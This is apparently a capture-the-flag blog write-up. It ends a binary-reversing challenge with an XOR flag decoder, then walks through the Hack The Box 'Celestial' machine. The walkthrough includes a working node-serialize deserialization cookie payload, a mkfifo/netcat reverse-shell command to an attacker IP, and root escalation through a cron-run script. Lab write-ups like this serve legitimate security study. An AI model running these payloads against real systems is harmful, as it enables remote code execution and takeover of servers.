 0x40010c:    0x261838221c060d0a    0x2c42591c2b390f36
 0x40011c:    0x392d171c262c1a36    0x0709382b07014357
 0x40012c:    0x392d17131317011a    0x2e007d5c46060d0a
 0x40013c:    0x6261747274736873    0x0000747865742e00
 0x40014c:    0x0000000000000000    0x0000000000000000

Next, we have to reverse the hex data because it’s stored as little-endian. Here is a really quick and dirty algorithm that does the reversing of the string and also concatenates the parts to one string. (There is certainly a better solution e.g. print the data in gdb with the right format)

import string

str1 = "261838221c060d0a"     
str2 = "2c42591c2b390f36"
str3 = "392d171c262c1a36"
str4 = "0709382b07014357"
str5 = "392d17131317011a"
str6 = "2e007d5c46060d0a"
str7 = "6261747274736873"
str8 = "0000747865742e00"

list = [str1, str2, str3, str4, str5, str6, str7, str8]
goal = ""

for i in range(0, 8): # loops through the list of the giant words dump
    for n in range(len(list[i]),0, -2): # iterate through the string backwards / reverse the string
            goal += list[i][n-2:n]

print(goal)

Next, we want to reverse the XOR operation. Since we know that the flag might start with β€œflag” we have some known plaintext. In our case 1 byte/character is enough to reverse the XOR operation. Let the first character be p[0] = β€˜f’ and the first ciphertext character be 0x0a we can get the next plaintext p[1] with chr(0x0a^ord('f')) = 'l'. To get the whole flag we just have to repeat the XOR operation on p[i] and c[i] to get p[i+1].

plain = "fl" # known plaintext 'flag'
counter = 1
goal = goal.decode("hex")
for char in goal[1:]:
     plain += chr(ord(char) ^ ord(plain[counter]))
     counter += 1
print plain
# flag{Yay_if_th1s_is_yer_f1rst_gnisrever_flag!}...non printables

That’s it.

Hack The Box: Celestial

26 August 2018 at 00:00

Today, we are going to do Celestial of Hack the Box.

Enumeration & Exploitation

First, we perform an initial nmap scan to find open ports.

# Nmap 7.70 scan initiated Mon Jul 23 06:58:10 2018 as: nmap -sV -sC -oA init 10.10.10.85
Nmap scan report for 10.10.10.85
Host is up (0.023s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 23 06:58:38 2018 -- 1 IP address (1 host up) scanned in 28.13 seconds

If we visit the page we are confronted with a 404 error page. But if we reload the page we can see a page with content: Hey Dummy 2 + 2 is 22.

Let’s take a closer look:

  • First open Burp Suite and configure your browser of choice to use 8080 as a proxy
  • Turn on intercept
  • Visit the website with cleared cache and cookies

We can see that on the first visit a cookie is set:

Set-Cookie: profile=eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D; Max-Age=900; Path=/;

The profile cookie looks very interesting because of the ending == which is almost always an indicator for base64 encoding. Now decode it as base64 and you’ll get a JSON object:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

If you remember the content of the page of our second visit (after the cookie is set), we can guess that the num field could be the value that is used for the β€˜computation’ shown above. Next, we can change the num field and insert another value like 3 which changes the output. Obviously, the JSON object is again base64 encoded and replaced in the HTTP header with the burp repeater.

Hey Dummy 3 + 3 is 33

Let’s send some special characters to the application (e.g. 3'>)

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>SyntaxError: Unexpected string<br> &nbsp; &nbsp;at /home/sun/server.js:13:29<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at next (/home/sun/node_modules/express/lib/router/route.js:137:13)<br> &nbsp; &nbsp;at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at /home/sun/node_modules/express/lib/router/index.js:281:22<br> &nbsp; &nbsp;at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)<br> &nbsp; &nbsp;at next (/home/sun/node_modules/express/lib/router/index.js:275:10)<br> &nbsp; &nbsp;at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)</pre>
</body>
</html>

Ok, we get a syntax error which means our input is parsed. Moreover, we have leaked some internal paths of the target.

Furthermore, we can do some research about nodejs exploitation which will lead to the exploitation of a unserialize function. If we dig deeper, we can execute a command like this [External Tutorial]:

First we open a netcat listener on our machine with nc -lvvp 1234 and then we can execute a command with

{"username":"Admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\nexec=require('child_process').exec;\nexec('echo 1234 | nc 10.10.15.XX 1234');\nreturn 1\n}()"}

If it was successful, we can change our command to something more useful:

{"username":"Admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\nexec=require('child_process').exec;\nexec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.XX 1234 >/tmp/f');\nreturn 1\n}()"}

Yes, got a shell!

nc -lvvp 1234
listening on [any] 1234 ...
10.10.10.85: inverse host lookup failed: Unknown host
connect to [10.10.14.232] from (UNKNOWN) [10.10.10.85] 41274
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(sun) gid=1000(sun) groups=1000(sun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

If we look at server.js in the home directory of the user, we can find the unserialize function and an eval expression which will execute our commands:

//...
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
//...
var sum = eval(obj.num + obj.num);
res.send("Hey " + obj.username + " " + obj.num + " + " + obj.num + " is " + sum);
//...

Privilege Escalation

Besides the user.txt, which contains the flag of the user account, we see a script called script.py with one line of python code print "Script is running...". If we take a look at the home directory we can find a root-owned file called output.txt which contains the string printed by the script above.

So, we can guess that the root user periodically executes the script of the user sun. Therefore, we can easily modify script.py to get a shell or simply leak the root.txt

Replace the content of script.py with our python code:

with open('/root/root.txt', 'rb') as f:
  print f.read()

After a few minutes, we can read the output.txt and we get the root flag.

Important: Please put the original code in script.py and remove the content of output.txt to avoid spoilers.


Happy Hacking! =)

❌